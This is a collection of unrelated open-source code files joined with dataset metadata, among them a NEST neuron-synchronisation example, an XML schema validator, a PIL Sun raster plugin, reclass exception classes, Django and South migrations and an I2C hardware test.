num_samples,
min_seq_len=None,
max_seq_len=None,
pad=True,
seed=None):
"""Samples valid integer-encoded sequences from the domain.
Args:
num_samples: The number of samples.
min_seq_len: The minimum sequence length of samples (inclusive).
max_seq_len: The maximum sequence length of samples (inclusive).
pad: Whether to pad sequences to the maximum length.
seed: Optional seed of the random number generator.
Returns:
A list with `num_samples` samples.
"""
if min_seq_len is None:
min_seq_len = self.min_length
if max_seq_len is None:
max_seq_len = self.length
random_state = utils.get_random_state(seed)
valid_token_ids = np.delete(self.vocab.token_ids, self.vocab.eos)
lengths = random_state.randint(min_seq_len, max_seq_len + 1, num_samples)
seqs = [random_state.choice(valid_token_ids, length)
for length in lengths]
if pad:
seqs = seq_utils.pad_sequences(seqs, self.length, self.vocab.eos)
return seqs
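# Illustrative sketch: variable-length sequences are terminated and padded
# with the EOS id (the exact padding behavior comes from
# seq_utils.pad_sequences, assumed here to pad up to `length`).
def _variable_length_example():
  vocab = Vocabulary(tokens=['A', 'B'], include_eos=True)
  domain = VariableLengthDiscreteDomain(vocab=vocab, length=4)
  encoded = domain.encode(['AB'], pad=True)[0]  # [0, 1, eos, eos]
  decoded = domain.decode([encoded])[0]  # 'AB'
  return encoded, decoded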
def is_discrete(domain):
"""Returns a bool indicating whether `domain` is discrete."""
return isinstance(domain, DiscreteDomain)
def check_if_discrete(domain):
"""Raises an exception if `domain` is not discrete."""
if not is_discrete(domain):
raise ValueError('Discrete domain expected!')
def is_variable_length(domain):
"""Returns a bool indicating whether `domain` is variable-length."""
return isinstance(domain, VariableLengthDiscreteDomain)
def domain_to_bos(domain):
"""Returns a pre-specified start-sequence symbol or a new symbol (len(vocab)).
If a new symbol is returned, it's not added to the vocabulary (only used as
input at the beginning of sequence).
Args:
domain: The problem's Domain instance.
"""
vocab = domain.vocab
return len(vocab) if vocab.bos is None else vocab.bos
|
apache-2.0
| -4,031,687,846,241,752,000
| 33.421569
| 81
| 0.662489
| false
| 3.82879
| false
| false
| false
|
hakonsbm/nest-simulator
|
pynest/examples/BrodyHopfield.py
|
1
|
4554
|
# -*- coding: utf-8 -*-
#
# BrodyHopfield.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""Spike synchronization through subthreshold oscillation
------------------------------------------------------------
This script reproduces the spike synchronization behavior
of integrate-and-fire neurons in response to a subthreshold
oscillation. This phenomenon is shown in Fig. 1 of [1]_.
Neurons receive a weak 35 Hz oscillation, a Gaussian noise current
and an increasing DC. The time-locking capability is shown to
depend on the input current given. The result is then plotted using
pylab. All parameters are taken from the above paper.
References
~~~~~~~~~~~~~
.. [1] Brody CD and Hopfield JJ (2003). Simple networks for
spike-timing-based computation, with application to olfactory
processing. Neuron 37, 843-852.
"""
#################################################################################
# First, we import all necessary modules for simulation, analysis, and plotting.
import nest
import nest.raster_plot
###############################################################################
# Second, the simulation parameters are assigned to variables.
N = 1000 # number of neurons
bias_begin = 140. # minimal value for the bias current injection [pA]
bias_end = 200. # maximal value for the bias current injection [pA]
T = 600 # simulation time (ms)
# parameters for the alternating-current generator
driveparams = {'amplitude': 50., 'frequency': 35.}
# parameters for the noise generator
noiseparams = {'mean': 0.0, 'std': 200.}
neuronparams = {'tau_m': 20., # membrane time constant
'V_th': 20., # threshold potential
'E_L': 10., # membrane resting potential
't_ref': 2., # refractory period
'V_reset': 0., # reset potential
'C_m': 200., # membrane capacitance
'V_m': 0.} # initial membrane potential
###############################################################################
# Third, the nodes are created using ``Create``. We store the returned handles
# in variables for later reference.
neurons = nest.Create('iaf_psc_alpha', N)
sd = nest.Create('spike_detector')
noise = nest.Create('noise_generator')
drive = nest.Create('ac_generator')
###############################################################################
# Set the parameters specified above for the generators using ``SetStatus``.
nest.SetStatus(drive, driveparams)
nest.SetStatus(noise, noiseparams)
###############################################################################
# Set the parameters specified above for the neurons. Neurons get an internal
# current. The first neuron additionally receives the current with amplitude
# `bias_begin`, the last neuron with amplitude `bias_end`.
nest.SetStatus(neurons, neuronparams)
nest.SetStatus(neurons, [{'I_e':
(n * (bias_end - bias_begin) / N + bias_begin)}
for n in neurons])
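# As a concrete example: with N = 1000 and the bias range above, neuron n
# receives I_e = n * 60. / 1000 + 140. pA, rising linearly from about
# 140 pA for the first neuron to 200 pA for the last.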
###############################################################################
# Set the parameters for the ``spike_detector``: recorded data should include
# the information about global IDs of spiking neurons and the time of
# individual spikes.
nest.SetStatus(sd, {"withgid": True, "withtime": True})
###############################################################################
# Connect the alternating-current and noise generators as well as
# the spike detector to the neurons.
nest.Connect(drive, neurons)
nest.Connect(noise, neurons)
nest.Connect(neurons, sd)
###############################################################################
# Simulate the network for time `T`.
nest.Simulate(T)
###############################################################################
# Plot the raster plot of the neuronal spiking activity.
nest.raster_plot.from_device(sd, hist=True)
|
gpl-2.0
| 3,528,837,289,585,193,000
| 37.923077
| 81
| 0.585859
| false
| 4.387283
| false
| false
| false
|
bschmoker/stix-validator
|
validators/xml_schema.py
|
1
|
7809
|
# Copyright (c) 2014, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
import os
from collections import defaultdict
from lxml import etree
class XmlSchemaValidator(object):
NS_XML_SCHEMA_INSTANCE = "http://www.w3.org/2001/XMLSchema-instance"
NS_XML_SCHEMA = "http://www.w3.org/2001/XMLSchema"
def __init__(self, schema_dir=None):
self.__imports = self._build_imports(schema_dir)
def _get_target_ns(self, fp):
'''Returns the target namespace for a schema file
Keyword Arguments
fp - the path to the schema file
'''
parser = etree.ETCompatXMLParser(huge_tree=True)
tree = etree.parse(fp, parser=parser)
root = tree.getroot()
return root.attrib['targetNamespace'] # throw an error if it
# doesn't exist...we can't
# validate
def _get_include_base_schema(self, list_schemas):
'''Returns the root schema which defines a namespace.
Certain schemas, such as OASIS CIQ use xs:include statements in their
schemas, where two schemas define a namespace (e.g., XAL.xsd and
XAL-types.xsd). This makes validation difficult, when we must refer to
one schema for a given namespace.
To fix this, we attempt to find the root schema which includes the
others. We do this by seeing if a schema has an xs:include element,
and if it does we assume that it is the parent. This is totally wrong
and needs to be fixed. Ideally this would build a tree of includes and
return the root node.
Keyword Arguments:
list_schemas - a list of schema file paths that all belong to the same
namespace
'''
parent_schema = None
tag_include = "{%s}include" % (self.NS_XML_SCHEMA)
for fn in list_schemas:
tree = etree.parse(fn)
root = tree.getroot()
includes = root.findall(tag_include)
if len(includes) > 0: # this is a hack that assumes if the schema
# includes others, it is the base schema for
# the namespace
return fn
return parent_schema
def _build_imports(self, schema_dir):
'''Given a directory of schemas, this builds a dictionary of schemas
that need to be imported under a wrapper schema in order to enable
validation. This returns a dictionary of the form
{namespace : path to schema}.
Keyword Arguments
schema_dir - a directory of schema files
'''
if not schema_dir:
return None
imports = defaultdict(list)
for top, dirs, files in os.walk(schema_dir):
for f in files:
if f.endswith('.xsd'):
fp = os.path.join(top, f)
target_ns = self._get_target_ns(fp)
imports[target_ns].append(fp)
for k, v in imports.iteritems():
if len(v) > 1:
base_schema = self._get_include_base_schema(v)
imports[k] = base_schema
else:
imports[k] = v[0]
return imports
def _build_wrapper_schema(self, import_dict):
'''Creates a wrapper schema that imports all namespaces defined by the
input dictionary. This enables validation of instance documents that
refer to multiple namespaces and schemas
Keyword Arguments
import_dict - a dictionary of the form {namespace : path to schema} that
will be used to build the list of xs:import statements
'''
schema_txt = '''<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"
targetNamespace="http://stix.mitre.org/tools/validator"
elementFormDefault="qualified"
attributeFormDefault="qualified"/>'''
root = etree.fromstring(schema_txt)
tag_import = "{%s}import" % (self.NS_XML_SCHEMA)
for ns, list_schemaloc in import_dict.iteritems():
schemaloc = list_schemaloc
schemaloc = schemaloc.replace("\\", "/")
attrib = {'namespace': ns, 'schemaLocation': schemaloc}
el_import = etree.Element(tag_import, attrib=attrib)
root.append(el_import)
return root
def _extract_schema_locations(self, root):
schemaloc_dict = {}
tag_schemaloc = "{%s}schemaLocation" % (self.NS_XML_SCHEMA_INSTANCE)
schemaloc = root.attrib[tag_schemaloc].split()
schemaloc_pairs = zip(schemaloc[::2], schemaloc[1::2])
for ns, loc in schemaloc_pairs:
schemaloc_dict[ns] = loc
return schemaloc_dict
def _build_result_dict(self, result, errors=None):
d = {}
d['result'] = result
if errors:
if not hasattr(errors, "__iter__"):
errors = [errors]
d['errors'] = errors
return d
def validate(self, doc, schemaloc=False):
'''Validates an instance document.
Returns a dict with a boolean 'result' entry and, if validation
failed, an 'errors' entry listing the validation errors.
Keyword Arguments
doc - a filename, file-like object, etree._Element, or
etree._ElementTree to be validated
'''
if not (schemaloc or self.__imports):
return self._build_result_dict(False,
"No schemas to validate "
"against! Try instantiating "
"XmlValidator with "
"use_schemaloc=True or setting the "
"schema_dir param in __init__")
if isinstance(doc, etree._Element):
root = doc
elif isinstance(doc, etree._ElementTree):
root = doc.getroot()
else:
try:
parser = etree.ETCompatXMLParser(huge_tree=True)
tree = etree.parse(doc, parser=parser)
root = tree.getroot()
except etree.XMLSyntaxError as e:
return self._build_result_dict(False, str(e))
if schemaloc:
try:
required_imports = self._extract_schema_locations(root)
except KeyError as e:
return self._build_result_dict(False,
"No schemaLocation attribute "
"set on instance document. "
"Unable to validate")
else:
required_imports = {}
# visit all nodes and gather schemas
for elem in root.iter():
for prefix, ns in elem.nsmap.iteritems():
schema_location = self.__imports.get(ns)
if schema_location:
required_imports[ns] = schema_location
if not required_imports:
return self._build_result_dict(False, "Unable to determine schemas "
"to validate against")
wrapper_schema_doc = self._build_wrapper_schema(import_dict=required_imports)
xmlschema = etree.XMLSchema(wrapper_schema_doc)
isvalid = xmlschema.validate(root)
if isvalid:
return self._build_result_dict(True)
else:
return self._build_result_dict(False,
[str(x) for x in xmlschema.error_log])
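# Illustrative usage sketch (the schema directory and file name below are
# hypothetical):
if __name__ == '__main__':
    validator = XmlSchemaValidator(schema_dir='schemas/')
    result = validator.validate('instance_document.xml')
    print result['result'], result.get('errors')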
|
bsd-3-clause
| -661,948,361,949,860,100
| 38.841837
| 85
| 0.548726
| false
| 4.585437
| false
| false
| false
|
on-three/asobot
|
asobot/emulator.py
|
1
|
1610
|
# vim: set ts=2 expandtab:
# -*- coding: utf-8 -*-
"""
Module: Emulator.py
Desc: pass keypresses to a game emulator or something.
Author: on_three
Email: on.three.email@gmail.com
DATE: Thursday, Jan 16th 2014
"""
import string
import re
from twisted.python import log
from controls import Key
class Emulator(object):
'''
pass commands to a game emulator of some sort.
'''
COMMAND_REGEX = ur'^(?P<command>:)(?P<commands>.+)$'
def __init__(self, parent, emulator_window_name):
'''
constructor
'''
self._parent = parent
self._window_name = emulator_window_name
def is_msg_of_interest(self, user, channel, msg):
'''
PLUGIN API REQUIRED
Is the rx'd irc message of interest to this plugin?
'''
m = re.match(Emulator.COMMAND_REGEX, msg)
if m:
log.msg('Message of interest...')
return True
else:
return False
def handle_msg(self, user, channel, msg):
'''
PLUGIN API REQUIRED
Handle message and return nothing
'''
log.msg('{channel} : {msg}'.format(channel=channel, msg=msg))
m = re.match(Emulator.COMMAND_REGEX, msg)
if not m:
return
# got a command introduced by the ':' command prefix
commands = m.groupdict()['commands']
self.keypresses_to_emulator(commands, channel)
def keypresses_to_emulator(self, keys, channel):
'''
Split commands by spaces. Each non spaced group represents
a series of buttons (or joystick directions) pressed TOGETHER
'''
presses = [x.strip() for x in keys.split(u' ')]
for p in presses:
Key.press(p, self._window_name)
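def _example_usage():
  '''Illustrative sketch only; the window name and the key strings
  below are hypothetical.'''
  e = Emulator(parent=None, emulator_window_name='fceux')
  e.handle_msg('user', '#channel', ':a b start')  # presses 'a', 'b', 'start'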
|
mit
| 2,284,341,602,436,959,700
| 23.769231
| 65
| 0.647205
| false
| 3.469828
| false
| false
| false
|
sserrot/champion_relationships
|
venv/Lib/site-packages/PIL/SunImagePlugin.py
|
1
|
4302
|
#
# The Python Imaging Library.
# $Id$
#
# Sun image file handling
#
# History:
# 1995-09-10 fl Created
# 1996-05-28 fl Fixed 32-bit alignment
# 1998-12-29 fl Import ImagePalette module
# 2001-12-18 fl Fixed palette loading (from Jean-Claude Rimbault)
#
# Copyright (c) 1997-2001 by Secret Labs AB
# Copyright (c) 1995-1996 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from . import Image, ImageFile, ImagePalette
from ._binary import i32be as i32
def _accept(prefix):
return len(prefix) >= 4 and i32(prefix) == 0x59A66A95
##
# Image plugin for Sun raster files.
class SunImageFile(ImageFile.ImageFile):
format = "SUN"
format_description = "Sun Raster File"
def _open(self):
# The Sun Raster file header is 32 bytes in length
# and has the following format:
# typedef struct _SunRaster
# {
# DWORD MagicNumber; /* Magic (identification) number */
# DWORD Width; /* Width of image in pixels */
# DWORD Height; /* Height of image in pixels */
# DWORD Depth; /* Number of bits per pixel */
# DWORD Length; /* Size of image data in bytes */
# DWORD Type; /* Type of raster file */
# DWORD ColorMapType; /* Type of color map */
# DWORD ColorMapLength; /* Size of the color map in bytes */
# } SUNRASTER;
# HEAD
s = self.fp.read(32)
if not _accept(s):
raise SyntaxError("not an SUN raster file")
offset = 32
self._size = i32(s[4:8]), i32(s[8:12])
depth = i32(s[12:16])
# data_length = i32(s[16:20]) # unreliable, ignore.
file_type = i32(s[20:24])
palette_type = i32(s[24:28]) # 0: None, 1: RGB, 2: Raw/arbitrary
palette_length = i32(s[28:32])
if depth == 1:
self.mode, rawmode = "1", "1;I"
elif depth == 4:
self.mode, rawmode = "L", "L;4"
elif depth == 8:
self.mode = rawmode = "L"
elif depth == 24:
if file_type == 3:
self.mode, rawmode = "RGB", "RGB"
else:
self.mode, rawmode = "RGB", "BGR"
elif depth == 32:
if file_type == 3:
self.mode, rawmode = "RGB", "RGBX"
else:
self.mode, rawmode = "RGB", "BGRX"
else:
raise SyntaxError("Unsupported Mode/Bit Depth")
if palette_length:
if palette_length > 1024:
raise SyntaxError("Unsupported Color Palette Length")
if palette_type != 1:
raise SyntaxError("Unsupported Palette Type")
offset = offset + palette_length
self.palette = ImagePalette.raw("RGB;L", self.fp.read(palette_length))
if self.mode == "L":
self.mode = "P"
rawmode = rawmode.replace("L", "P")
# 16 bit boundaries on stride
stride = ((self.size[0] * depth + 15) // 16) * 2
# file type: Type is the version (or flavor) of the bitmap
# file. The following values are typically found in the Type
# field:
# 0000h Old
# 0001h Standard
# 0002h Byte-encoded
# 0003h RGB format
# 0004h TIFF format
# 0005h IFF format
# FFFFh Experimental
# Old and standard are the same, except for the length tag.
# byte-encoded is run-length-encoded
# RGB looks similar to standard, but RGB byte order
# TIFF and IFF mean that they were converted from T/IFF
# Experimental means that it's something else.
# (https://www.fileformat.info/format/sunraster/egff.htm)
if file_type in (0, 1, 3, 4, 5):
self.tile = [("raw", (0, 0) + self.size, offset, (rawmode, stride))]
elif file_type == 2:
self.tile = [("sun_rle", (0, 0) + self.size, offset, rawmode)]
else:
raise SyntaxError("Unsupported Sun Raster file type")
#
# registry
Image.register_open(SunImageFile.format, SunImageFile, _accept)
Image.register_extension(SunImageFile.format, ".ras")
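# Illustrative sketch: the 32-byte header documented in SunImageFile._open
# can also be read directly as eight big-endian DWORDs (the file path
# argument below is hypothetical):
def _read_sun_header(path):
    import struct
    with open(path, "rb") as fp:
        # magic, width, height, depth, length, type, cmap type, cmap length
        return struct.unpack(">8I", fp.read(32))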
|
mit
| -6,823,107,286,268,212,000
| 30.632353
| 82
| 0.547652
| false
| 3.683219
| false
| false
| false
|
JingheZ/shogun
|
examples/undocumented/python_modular/structure_discrete_hmsvm_mosek.py
|
2
|
1217
|
#!/usr/bin/env python
import numpy
import scipy
from scipy import io
data_dict = scipy.io.loadmat('../data/hmsvm_data_large_integer.mat', struct_as_record=False)
parameter_list=[[data_dict]]
def structure_discrete_hmsvm_mosek (m_data_dict=data_dict):
from modshogun import RealMatrixFeatures
from modshogun import SequenceLabels, HMSVMModel, Sequence, TwoStateModel, SMT_TWO_STATE
from modshogun import StructuredAccuracy
try:
from modshogun import PrimalMosekSOSVM
except ImportError:
print("Mosek not available")
return
labels_array = m_data_dict['label'][0]
idxs = numpy.nonzero(labels_array == -1)
labels_array[idxs] = 0
labels = SequenceLabels(labels_array, 250, 500, 2)
features = RealMatrixFeatures(m_data_dict['signal'].astype(float), 250, 500)
num_obs = 4 # given by the data file used
model = HMSVMModel(features, labels, SMT_TWO_STATE, num_obs)
sosvm = PrimalMosekSOSVM(model, labels)
sosvm.train()
#print(sosvm.get_w())
predicted = sosvm.apply()
evaluator = StructuredAccuracy()
acc = evaluator.evaluate(predicted, labels)
#print('Accuracy = %.4f' % acc)
if __name__ == '__main__':
print("Discrete HMSVM Mosek")
structure_discrete_hmsvm_mosek(*parameter_list[0])
|
gpl-3.0
| 2,882,753,445,676,237,000
| 26.659091
| 92
| 0.733772
| false
| 2.83683
| false
| false
| false
|
madduck/reclass
|
reclass/errors.py
|
2
|
6324
|
#
# -*- coding: utf-8 -*-
#
# This file is part of reclass (http://github.com/madduck/reclass)
#
# Copyright © 2007–14 martin f. krafft <madduck@madduck.net>
# Released under the terms of the Artistic Licence 2.0
#
import posix, sys
import traceback
from reclass.defaults import PARAMETER_INTERPOLATION_SENTINELS
class ReclassException(Exception):
def __init__(self, rc=posix.EX_SOFTWARE, msg=None):
super(ReclassException, self).__init__()
self._rc = rc
self._msg = msg
self._traceback = traceback.format_exc()
message = property(lambda self: self._get_message())
rc = property(lambda self: self._rc)
def _get_message(self):
if self._msg:
return self._msg
else:
return 'No error message provided.'
def exit_with_message(self, out=sys.stderr):
print >>out, self.message
if self._traceback:
print >>out, self._traceback
sys.exit(self.rc)
class PermissionError(ReclassException):
def __init__(self, msg, rc=posix.EX_NOPERM):
super(PermissionError, self).__init__(rc=rc, msg=msg)
class InvocationError(ReclassException):
def __init__(self, msg, rc=posix.EX_USAGE):
super(InvocationError, self).__init__(rc=rc, msg=msg)
class ConfigError(ReclassException):
def __init__(self, msg, rc=posix.EX_CONFIG):
super(ConfigError, self).__init__(rc=rc, msg=msg)
class DuplicateUriError(ConfigError):
def __init__(self, nodes_uri, classes_uri):
super(DuplicateUriError, self).__init__(msg=None)
self._nodes_uri = nodes_uri
self._classes_uri = classes_uri
def _get_message(self):
return "The inventory URIs must not be the same " \
"for nodes and classes: {0}".format(self._nodes_uri)
class UriOverlapError(ConfigError):
def __init__(self, nodes_uri, classes_uri):
super(UriOverlapError, self).__init__(msg=None)
self._nodes_uri = nodes_uri
self._classes_uri = classes_uri
def _get_message(self):
msg = "The URIs for the nodes and classes inventories must not " \
"overlap, but {0} and {1} do."
return msg.format(self._nodes_uri, self._classes_uri)
class NotFoundError(ReclassException):
def __init__(self, msg, rc=posix.EX_IOERR):
super(NotFoundError, self).__init__(rc=rc, msg=msg)
class NodeNotFound(NotFoundError):
def __init__(self, storage, nodename, uri):
super(NodeNotFound, self).__init__(msg=None)
self._storage = storage
self._name = nodename
self._uri = uri
def _get_message(self):
msg = "Node '{0}' not found under {1}://{2}"
return msg.format(self._name, self._storage, self._uri)
class ClassNotFound(NotFoundError):
def __init__(self, storage, classname, uri, nodename=None):
super(ClassNotFound, self).__init__(msg=None)
self._storage = storage
self._name = classname
self._uri = uri
self._nodename = nodename
def _get_message(self):
if self._nodename:
msg = "Class '{0}' (in ancestry of node '{1}') not found " \
"under {2}://{3}"
else:
msg = "Class '{0}' not found under {2}://{3}"
return msg.format(self._name, self._nodename, self._storage, self._uri)
def set_nodename(self, nodename):
self._nodename = nodename
class InterpolationError(ReclassException):
def __init__(self, msg, rc=posix.EX_DATAERR):
super(InterpolationError, self).__init__(rc=rc, msg=msg)
class UndefinedVariableError(InterpolationError):
def __init__(self, var, context=None):
super(UndefinedVariableError, self).__init__(msg=None)
self._var = var
self._context = context
var = property(lambda self: self._var)
context = property(lambda self: self._context)
def _get_message(self):
msg = "Cannot resolve " + self._var.join(PARAMETER_INTERPOLATION_SENTINELS)
if self._context:
msg += ' in the context of %s' % self._context
return msg
def set_context(self, context):
self._context = context
class IncompleteInterpolationError(InterpolationError):
def __init__(self, string, end_sentinel):
super(IncompleteInterpolationError, self).__init__(msg=None)
self._ref = string.join(PARAMETER_INTERPOLATION_SENTINELS)
self._end_sentinel = end_sentinel
def _get_message(self):
msg = "Missing '{0}' to end reference: {1}"
return msg.format(self._end_sentinel, self._ref)
class InfiniteRecursionError(InterpolationError):
def __init__(self, path, ref):
super(InfiniteRecursionError, self).__init__(msg=None)
self._path = path
self._ref = ref.join(PARAMETER_INTERPOLATION_SENTINELS)
def _get_message(self):
msg = "Infinite recursion while resolving {0} at {1}"
return msg.format(self._ref, self._path)
class MappingError(ReclassException):
def __init__(self, msg, rc=posix.EX_DATAERR):
super(MappingError, self).__init__(rc=rc, msg=msg)
class MappingFormatError(MappingError):
def __init__(self, msg):
super(MappingFormatError, self).__init__(msg)
class NameError(ReclassException):
def __init__(self, msg, rc=posix.EX_DATAERR):
super(NameError, self).__init__(rc=rc, msg=msg)
class InvalidClassnameError(NameError):
def __init__(self, invalid_character, classname):
super(InvalidClassnameError, self).__init__(msg=None)
self._char = invalid_character
self._classname = classname
def _get_message(self):
msg = "Invalid character '{0}' in class name '{1}'."
return msg.format(self._char, self._classname)
class DuplicateNodeNameError(NameError):
def __init__(self, storage, name, uri1, uri2):
super(DuplicateNodeNameError, self).__init__(msg=None)
self._storage = storage
self._name = name
self._uris = (uri1, uri2)
def _get_message(self):
msg = "{0}: Definition of node '{1}' in '{2}' collides with " \
"definition in '{3}'. Nodes can only be defined once " \
"per inventory."
return msg.format(self._storage, self._name, self._uris[1], self._uris[0])
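# Illustrative sketch (names below are hypothetical): each error carries a
# POSIX exit code and builds its message lazily via _get_message().
def _example_usage():
    try:
        raise UndefinedVariableError('foo', context='some.node')
    except UndefinedVariableError as e:
        return e.rc, e.message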
|
artistic-2.0
| 5,022,595,609,476,263,000
| 28.676056
| 83
| 0.621895
| false
| 3.668601
| false
| false
| false
|
stencila/hub
|
manager/users/migrations/0001_initial.py
|
1
|
5290
|
# Generated by Django 3.0.8 on 2020-07-08 22:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import users.models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='Invite',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('key', models.CharField(default=users.models.generate_invite_key, help_text='The key for the invite.', max_length=64, unique=True)),
('email', models.EmailField(help_text='The email address of the person you are inviting.', max_length=2048)),
('message', models.TextField(blank=True, help_text='An optional message to send to the invitee.', null=True)),
('created', models.DateTimeField(auto_now_add=True, help_text='When the invite was created.')),
('sent', models.DateTimeField(blank=True, help_text='When the invite was sent.', null=True)),
('accepted', models.BooleanField(default=False, help_text='Whether the invite has been accepted. Will only be true if the user has clicked on the invitation AND authenticated.')),
('completed', models.DateTimeField(blank=True, help_text='When the invite action was completed', null=True)),
('action', models.CharField(blank=True, choices=[('join_account', 'Join account'), ('join_team', 'Join team'), ('join_project', 'Join project'), ('take_tour', 'Take tour')], help_text='The action to perform when the invitee signs up.', max_length=64, null=True)),
('subject_id', models.IntegerField(blank=True, help_text='The id of the target of the action.', null=True)),
('arguments', models.JSONField(blank=True, help_text='Any additional arguments to pass to the action.', null=True)),
('inviter', models.ForeignKey(blank=True, help_text='The user who created the invite.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invites', to=settings.AUTH_USER_MODEL)),
('subject_type', models.ForeignKey(blank=True, help_text='The type of the target of the action. e.g Team, Account', null=True, on_delete=django.db.models.deletion.CASCADE, to='contenttypes.ContentType')),
],
),
migrations.CreateModel(
name='Flag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(help_text='The human/computer readable name.', max_length=100, unique=True, verbose_name='Name')),
('everyone', models.NullBooleanField(help_text='Flip this flag on (Yes) or off (No) for everyone, overriding all other settings. Leave as Unknown to use normally.', verbose_name='Everyone')),
('percent', models.DecimalField(blank=True, decimal_places=1, help_text='A number between 0.0 and 99.9 to indicate a percentage of users for whom this flag will be active.', max_digits=3, null=True, verbose_name='Percent')),
('testing', models.BooleanField(default=False, help_text='Allow this flag to be set for a session for user testing', verbose_name='Testing')),
('superusers', models.BooleanField(default=True, help_text='Flag always active for superusers?', verbose_name='Superusers')),
('staff', models.BooleanField(default=False, help_text='Flag always active for staff?', verbose_name='Staff')),
('authenticated', models.BooleanField(default=False, help_text='Flag always active for authenticated users?', verbose_name='Authenticated')),
('languages', models.TextField(blank=True, default='', help_text='Activate this flag for users with one of these languages (comma-separated list)', verbose_name='Languages')),
('rollout', models.BooleanField(default=False, help_text='Activate roll-out mode?', verbose_name='Rollout')),
('note', models.TextField(blank=True, help_text='Note where this Flag is used.', verbose_name='Note')),
('created', models.DateTimeField(db_index=True, default=django.utils.timezone.now, help_text='Date when this Flag was created.', verbose_name='Created')),
('modified', models.DateTimeField(default=django.utils.timezone.now, help_text='Date when this Flag was last modified.', verbose_name='Modified')),
('groups', models.ManyToManyField(blank=True, help_text='Activate this flag for these user groups.', to='auth.Group', verbose_name='Groups')),
('users', models.ManyToManyField(blank=True, help_text='Activate this flag for these users.', to=settings.AUTH_USER_MODEL, verbose_name='Users')),
],
options={
'verbose_name': 'Flag',
'verbose_name_plural': 'Flags',
'abstract': False,
},
),
]
|
apache-2.0
| 5,189,788,996,011,161,000
| 81.65625
| 279
| 0.652174
| false
| 4.242181
| false
| false
| false
|
Nic30/hwtLib
|
hwtLib/peripheral/i2c/masterBitCntrl_test.py
|
1
|
1862
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from collections import deque
import unittest
from hwt.simulator.simTestCase import SimTestCase
from hwtLib.peripheral.i2c.intf import I2cAgent
from hwtLib.peripheral.i2c.masterBitCntrl import I2cMasterBitCtrl, \
NOP, START, READ, WRITE
from hwtSimApi.constants import CLK_PERIOD
from pyMathBitPrecise.bit_utils import get_bit
class I2CMasterBitCntrlTC(SimTestCase):
@classmethod
def setUpClass(cls):
cls.u = I2cMasterBitCtrl()
cls.compileSim(cls.u)
def test_nop(self):
u = self.u
u.cntrl._ag.data.append((NOP, 0))
u.clk_cnt_initVal._ag.data.append(4)
self.runSim(20 * CLK_PERIOD)
self.assertFalse(u.i2c._ag.hasTransactionPending())
def test_startbit(self):
u = self.u
u.cntrl._ag.data.extend([(START, 0), (NOP, 0)])
u.clk_cnt_initVal._ag.data.append(4)
self.runSim(60 * CLK_PERIOD)
self.assertEqual(u.i2c._ag.bit_cntrl_rx, deque([I2cAgent.START]))
def test_7bitAddr(self):
u = self.u
addr = 13
mode = I2cAgent.READ
u.cntrl._ag.data.extend(
[(START, 0), ] +
[(WRITE, get_bit(addr, 7 - i - 1)) for i in range(7)] +
[(WRITE, mode),
(READ, 0),
(NOP, 0)
])
u.clk_cnt_initVal._ag.data.append(4)
self.runSim(70 * CLK_PERIOD)
self.assertValSequenceEqual(
u.i2c._ag.bit_cntrl_rx,
[I2cAgent.START] +
[get_bit(addr, 7 - i - 1)
for i in range(7)] +
[mode])
if __name__ == "__main__":
suite = unittest.TestSuite()
# suite.addTest(I2CMasterBitCntrlTC('test_nop'))
suite.addTest(unittest.makeSuite(I2CMasterBitCntrlTC))
runner = unittest.TextTestRunner(verbosity=3)
runner.run(suite)
|
mit
| 4,142,820,898,430,028,300
| 27.646154
| 73
| 0.593985
| false
| 3.067545
| true
| false
| false
|
mvaled/sentry
|
src/sentry/south_migrations/0397_auto__add_latestrelease__add_unique_latestrelease_repository_id_enviro.py
|
1
|
102302
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
# Flag to indicate if this migration is too risky
# to run online and needs to be coordinated for offline
is_dangerous = False
def forwards(self, orm):
# Adding model 'LatestRelease'
db.create_table('sentry_latestrelease', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('repository_id', self.gf('sentry.db.models.fields.bounded.BoundedBigIntegerField')()),
('environment_id', self.gf('sentry.db.models.fields.bounded.BoundedBigIntegerField')()),
('release_id', self.gf('sentry.db.models.fields.bounded.BoundedBigIntegerField')()),
('deploy_id', self.gf('sentry.db.models.fields.bounded.BoundedBigIntegerField')(null=True)),
('commit_id', self.gf('sentry.db.models.fields.bounded.BoundedBigIntegerField')(null=True)),
))
db.send_create_signal('sentry', ['LatestRelease'])
# Adding unique constraint on 'LatestRelease', fields ['repository_id', 'environment_id']
db.create_unique('sentry_latestrelease', ['repository_id', 'environment_id'])
def backwards(self, orm):
# Removing unique constraint on 'LatestRelease', fields ['repository_id', 'environment_id']
db.delete_unique('sentry_latestrelease', ['repository_id', 'environment_id'])
# Deleting model 'LatestRelease'
db.delete_table('sentry_latestrelease')
models = {
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
